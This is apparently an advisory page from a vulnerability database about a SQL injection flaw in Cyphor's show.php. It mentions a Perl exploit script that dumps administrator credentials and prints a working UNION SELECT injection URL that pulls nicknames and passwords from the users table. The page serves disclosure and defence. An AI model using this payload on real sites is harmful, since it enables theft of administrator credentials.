Cyphor Show.PHP SQL Injection Vulnerability

info
discussion
exploit
solution
references

Cyphor Show.PHP SQL Injection Vulnerability

A PERL script that attempts to output administrative account details, such as login and password, has been made available in the exploit section.

Sample SQL injection code has been provided:
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,
password,null,null,null%20from%20users%20where%20id=1

/data/vulnerabilities/exploits/cyphor_sql.pl